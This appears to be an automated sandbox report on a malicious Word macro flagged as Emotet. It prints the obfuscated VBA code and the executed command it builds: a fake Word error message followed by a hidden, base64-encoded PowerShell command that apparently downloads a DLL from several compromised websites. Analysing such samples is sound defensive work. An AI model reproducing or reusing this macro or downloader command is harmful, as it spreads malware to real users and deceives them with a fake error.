Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Dulz0g2a3qqdjsty7

Declaration

Line	Content
1	Attribute VB_Name = "Dulz0g2a3qqdjsty7"

Executed Functions

Function Ekyjujey2miwyla, APIs: 145, Strings: 71, Number of lines: 234, Relevance: 388.734

APIs	Meta Information
IcgiD
Paragraphs
Range
Range
UBound
wONTemEFr
MidB$
R94sbg0kp8g5
Content
Puaskfwqwxz_
HmdtGfbHA
Paragraphs
Range
Range
UBound
kVnSBBJ
MidB$
ydHfQ
Paragraphs
Range
Range
UBound
PwKrSn
MidB$
lSvxKAE
Paragraphs
Range
Range
UBound
WolyDl
MidB$
YMkAJIp
Paragraphs
Range
Range
UBound
nZrgFol
MidB$
Mid
Name
Application
NRXsPIGD
Paragraphs
Range
Range
UBound
IwzPAgE
MidB$
HtbOAHKIF
Paragraphs
Range
Range
UBound
BvwhhQNB
MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: FoVpJCArD
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: aOIKG
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: VSeBJC
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: fHEAXGB
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: gYFIC
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: PlYykHypI
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: beoayAGAs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: FWzgiHG
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
ezXAHG
Paragraphs
Range
Range
UBound
pWDVU
MidB$
CreateObject	CreateObject("winmgmts:win32_process")
HYflxGv
Paragraphs
Range
Range
UBound
dBfQDv
MidB$
Mid
Len	Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAdx [ sh bgAgx [ sh bACAx [ sh bAUAx [ sh bBCAx [ sh bDUAx [ sh bbwAx [ sh bgACx [ sh bAAKx [ sh bABbx [ sh bAFQx [ sh bAWQx [ sh bBwAx [ sh bEUAx [ sh bXQAx [ sh boACx [ sh bIAex [ sh bwAyx [ sh bAH0x [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh b1AHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bAwAx [ sh bH0Ax [ sh bewAx [ sh b2AHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAIgx [ sh bAgAx [ sh bC0Ax [ sh bRgAx [ sh bgACx [ sh bcAVx [ sh bAAnx [ sh bACwx [ sh bAJwx [ sh bBFAx [ sh bE0Ax [ sh bLgBx [ sh bJACx [ sh bcALx [ sh bAAnx [ sh bAFMx [ sh bAWQx [ sh bBzAx [ sh bFQAx [ sh bJwAx [ sh bsACx [ sh bcAZx [ sh bQBDx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bHkAx [ sh bJwAx [ sh bsACx [ sh bcAbx [ sh bwAux [ sh bAEQx [ sh bASQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh b8AUx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bApAx [ sh bCAAx [ sh bOwAx [ sh bgACx [ sh bAAUx [ sh bwBFx [ sh bAHQx [ sh bALQx [ sh bBJAx [ sh bFQAx [ sh bRQBx [ sh btACx [ sh bAAdx [ sh bgBBx [ sh bAFIx [ sh bASQx [ sh bBhAx [ sh bEIAx [ sh bTABx [ sh blADx [ sh boAbx [ sh bQA3x [ sh bAGEx [ sh bAOQx [ sh bAgAx [ sh bCgAx [ sh bWwBx [ sh b0AHx [ sh bkAcx [ sh bABFx [ sh bAF0x [ sh bAKAx [ sh bAiAx [ sh bHsAx [ sh bNABx [ sh b9AHx [ sh bsAMx [ sh bgB9x [ sh bAHsx [ sh bAMwx [ sh bB9Ax [ sh bHsAx [ sh bNQBx [ sh b9AHx [ sh bsAMx [ sh bQB9x [ sh bAHsx [ sh bANgx [ sh bB9Ax [ sh bHsAx [ sh bMABx [ sh b9AHx [ sh bsANx [ sh bwB9x [ sh bACIx [ sh bAIAx [ sh bAtAx [ sh bGYAx [ sh bJwBx [ sh buACx [ sh bcALx [ sh bAAnx [ sh bAEkx [ sh bAQwx [ sh bBFAx [ sh bHAAx [ sh bTwBx [ sh bJAEx [ sh b4Adx [ sh bABtx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bG4Ax [ sh bZQBx [ sh bUACx [ sh bcALx [ sh bAAnx [ sh bAC4x [ sh bAJwx [ sh bAsAx [ sh bCcAx [ sh bcwBx [ sh b5AFx [ sh bMAdx [ sh bABlx [ sh bAE0x [ sh bALgx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bzAEx [ sh bUAUx [ sh bgB2x [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bEEAx [ sh bJwAx [ sh bsACx [ sh bcAYx [ sh bQBHx [ sh bAGUx [ sh bAcgx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bpACx [ sh bAAIx [ sh bAA7x [ sh bACAx [ sh bAIAx [ sh bAkAx [ sh bEkAx [ sh baABx [ sh b2ADx [ sh bgAOx [ sh bQBfx [ sh bAGcx [ sh bAPQx [ sh bAkAx [ sh bE0Ax [ sh bOQAx [ sh bxAEx [ sh bcAIx [ sh bAArx [ sh bACAx [ sh bAWwx [ sh bBjAx [ sh bGgAx [ sh bYQBx [ sh byAFx [ sh b0AKx [ sh bAAzx [ sh bADMx [ sh bAKQx [ sh bAgAx [ sh bCsAx [ sh bIAAx [ sh bkAEx [ sh bgAMx [ sh bgAzx [ sh bAEQx [ sh bAOwx [ sh bAkAx [ sh bEQAx [ sh bOQAx [ sh b0AEx [ sh b0APx [ sh bQAox [ sh bACgx [ sh bAJwx [ sh bBQAx [ sh bDcAx [ sh bJwAx [ sh brACx [ sh bcAMx [ sh bgAnx [ sh bACkx [ sh bAKwx [ sh bAnAx [ sh bFgAx [ sh bJwAx [ sh bpADx [ sh bsAIx [ sh bAAox [ sh bAGcx [ sh bARQx [ sh bBUAx [ sh bC0Ax [ sh bdgBx [ sh bhAHx [ sh bIAax [ sh bQBhx [ sh bAEIx [ sh bAbAx [ sh bBlAx [ sh bCAAx [ sh bcABx [ s) -> 22560
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: FoVpJCArD
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: aOIKG
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: VSeBJC
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: fHEAXGB
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: gYFIC
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: PlYykHypI
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: beoayAGAs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: Range
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: FWzgiHG
Part of subcall function Bcdtdfsryv3bc@Dulz0g2a3qqdjsty7: MidB$
UvPjdXBJH
Paragraphs
Range
Range
UBound
hrhpx
MidB$
Create	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB,,) -> 0
Bf0256837rexe
A95ize8agn0fuh
fgxZE
Paragraphs
Range
Range
UBound
tFqUPL
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bpx [ sh b"
"x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
2	Function Ekyjujey2miwyla()
3	Goto FkmBAH	executed
4	Set uifQEJ = IcgiD	IcgiD
5	Dim uwljH, rdwmZFK, OJlopx as Long
6	Dim zxmKGAJHA as Word.Paragraph
7	Dim okSXVy() as Byte
8	For Each zxmKGAJHA in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
9	okSXVy = zxmKGAJHA.Range	Range
10	dscc = "sadsaccc" & zxmKGAJHA.Range	Range
11	rdwmZFK = UBound(okSXVy) - 1	UBound
12	uwljH = 0
13	Set EeuJHEHF = wONTemEFr	wONTemEFr
14	Do Until rdwmZFK > rdwmZFK
15	If okSXVy(rdwmZFK) = 46 Or rdwmZFK = rdwmZFK Then
16	dscc = "sasdsacc" & (uwljH / 2) + 1 & " to " & (rdwmZFK / 2) + 1 & MidB$(okSXVy, uwljH + 1, rdwmZFK - uwljH + 3)	MidB$
17	uwljH = rdwmZFK + 2
18	Endif
19	rdwmZFK = rdwmZFK + 2
20	Loop
21	Next	Paragraphs
21	FkmBAH:
23	skuwd = R94sbg0kp8g5 + Sky5mdbfre3xe7q8.Content + Puaskfwqwxz_	R94sbg0kp8g5 Content Puaskfwqwxz_
26	Goto dNKFVFD
27	Set WDyUCG = HmdtGfbHA	HmdtGfbHA
28	Dim FgPjRJEIR, PJULJBb, MiRGG as Long
29	Dim lkPbvChTB as Word.Paragraph
30	Dim msHCWHCAt() as Byte
31	For Each lkPbvChTB in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
32	msHCWHCAt = lkPbvChTB.Range	Range
33	dscc = "sadsaccc" & lkPbvChTB.Range	Range
34	PJULJBb = UBound(msHCWHCAt) - 1	UBound
35	FgPjRJEIR = 0
36	Set DEdCJACpO = kVnSBBJ	kVnSBBJ
37	Do Until PJULJBb > PJULJBb
38	If msHCWHCAt(PJULJBb) = 46 Or PJULJBb = PJULJBb Then
39	dscc = "sasdsacc" & (FgPjRJEIR / 2) + 1 & " to " & (PJULJBb / 2) + 1 & MidB$(msHCWHCAt, FgPjRJEIR + 1, PJULJBb - FgPjRJEIR + 3)	MidB$
40	FgPjRJEIR = PJULJBb + 2
41	Endif
42	PJULJBb = PJULJBb + 2
43	Loop
44	Next	Paragraphs
44	dNKFVFD:
46	wjnsc = "x [ sh bpx [ sh b"
47	Eh1e1l6qq9w6uz3 = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
48	Goto RrOlGJCr
49	Set arYPBNC = ydHfQ	ydHfQ
50	Dim rqaveCGz, TWSLHrEJ, tTUuY as Long
51	Dim WystvJDiH as Word.Paragraph
52	Dim kGKlCH() as Byte
53	For Each WystvJDiH in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
54	kGKlCH = WystvJDiH.Range	Range
55	dscc = "sadsaccc" & WystvJDiH.Range	Range
56	TWSLHrEJ = UBound(kGKlCH) - 1	UBound
57	rqaveCGz = 0
58	Set VJBiOEoB = PwKrSn	PwKrSn
59	Do Until TWSLHrEJ > TWSLHrEJ
60	If kGKlCH(TWSLHrEJ) = 46 Or TWSLHrEJ = TWSLHrEJ Then
61	dscc = "sasdsacc" & (rqaveCGz / 2) + 1 & " to " & (TWSLHrEJ / 2) + 1 & MidB$(kGKlCH, rqaveCGz + 1, TWSLHrEJ - rqaveCGz + 3)	MidB$
62	rqaveCGz = TWSLHrEJ + 2
63	Endif
64	TWSLHrEJ = TWSLHrEJ + 2
65	Loop
66	Next	Paragraphs
66	RrOlGJCr:
68	Czs06fohvxu97 = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
69	Goto YEfXME
70	Set FlHJG = lSvxKAE	lSvxKAE
71	Dim eKFHKDJw, GnnqWGPGJ, JPAoPL as Long
72	Dim HoycEGGS as Word.Paragraph
73	Dim KWoNDrI() as Byte
74	For Each HoycEGGS in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
75	KWoNDrI = HoycEGGS.Range	Range
76	dscc = "sadsaccc" & HoycEGGS.Range	Range
77	GnnqWGPGJ = UBound(KWoNDrI) - 1	UBound
78	eKFHKDJw = 0
79	Set aMiqITVGL = WolyDl	WolyDl
80	Do Until GnnqWGPGJ > GnnqWGPGJ
81	If KWoNDrI(GnnqWGPGJ) = 46 Or GnnqWGPGJ = GnnqWGPGJ Then
82	dscc = "sasdsacc" & (eKFHKDJw / 2) + 1 & " to " & (GnnqWGPGJ / 2) + 1 & MidB$(KWoNDrI, eKFHKDJw + 1, GnnqWGPGJ - eKFHKDJw + 3)	MidB$
83	eKFHKDJw = GnnqWGPGJ + 2
84	Endif
85	GnnqWGPGJ = GnnqWGPGJ + 2
86	Loop
87	Next	Paragraphs
87	YEfXME:
89	Bte4bjpfxry = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
90	Goto kfglYjE
91	Set uvWvDCq = YMkAJIp	YMkAJIp
92	Dim cEEUvC, WotFy, dQimAHCD as Long
93	Dim NswmEPELA as Word.Paragraph
94	Dim QGvuB() as Byte
95	For Each NswmEPELA in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
96	QGvuB = NswmEPELA.Range	Range
97	dscc = "sadsaccc" & NswmEPELA.Range	Range
98	WotFy = UBound(QGvuB) - 1	UBound
99	cEEUvC = 0
100	Set itfbnIkB = nZrgFol	nZrgFol
101	Do Until WotFy > WotFy
102	If QGvuB(WotFy) = 46 Or WotFy = WotFy Then
103	dscc = "sasdsacc" & (cEEUvC / 2) + 1 & " to " & (WotFy / 2) + 1 & MidB$(QGvuB, cEEUvC + 1, WotFy - cEEUvC + 3)	MidB$
104	cEEUvC = WotFy + 2
105	Endif
106	WotFy = WotFy + 2
107	Loop
108	Next	Paragraphs
108	kfglYjE:
110	Dj2098s6rmd = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"	Mid Name Application
111	Goto TPpjQ
112	Set qPVaAz = NRXsPIGD	NRXsPIGD
113	Dim qpYICE, iPrzI, KboWpC as Long
114	Dim jKqFehtZP as Word.Paragraph
115	Dim piVqgYJ() as Byte
116	For Each jKqFehtZP in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
117	piVqgYJ = jKqFehtZP.Range	Range
118	dscc = "sadsaccc" & jKqFehtZP.Range	Range
119	iPrzI = UBound(piVqgYJ) - 1	UBound
120	qpYICE = 0
121	Set lMxaZeHEA = IwzPAgE	IwzPAgE
122	Do Until iPrzI > iPrzI
123	If piVqgYJ(iPrzI) = 46 Or iPrzI = iPrzI Then
124	dscc = "sasdsacc" & (qpYICE / 2) + 1 & " to " & (iPrzI / 2) + 1 & MidB$(piVqgYJ, qpYICE + 1, iPrzI - qpYICE + 3)	MidB$
125	qpYICE = iPrzI + 2
126	Endif
127	iPrzI = iPrzI + 2
128	Loop
129	Next	Paragraphs
129	TPpjQ:
131	Acanctsdu93 = Bte4bjpfxry + Dj2098s6rmd + Czs06fohvxu97 + wjnsc + Eh1e1l6qq9w6uz3
132	Goto vajlM
133	Set XbFndWSCC = HtbOAHKIF	HtbOAHKIF
134	Dim QntVIZAdD, XFQcotHEl, CYtYuIW as Long
135	Dim rGxSBFAm as Word.Paragraph
136	Dim ugTHSC() as Byte
137	For Each rGxSBFAm in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
138	ugTHSC = rGxSBFAm.Range	Range
139	dscc = "sadsaccc" & rGxSBFAm.Range	Range
140	XFQcotHEl = UBound(ugTHSC) - 1	UBound
141	QntVIZAdD = 0
142	Set YxuWVAC = BvwhhQNB	BvwhhQNB
143	Do Until XFQcotHEl > XFQcotHEl
144	If ugTHSC(XFQcotHEl) = 46 Or XFQcotHEl = XFQcotHEl Then
145	dscc = "sasdsacc" & (QntVIZAdD / 2) + 1 & " to " & (XFQcotHEl / 2) + 1 & MidB$(ugTHSC, QntVIZAdD + 1, XFQcotHEl - QntVIZAdD + 3)	MidB$
146	QntVIZAdD = XFQcotHEl + 2
147	Endif
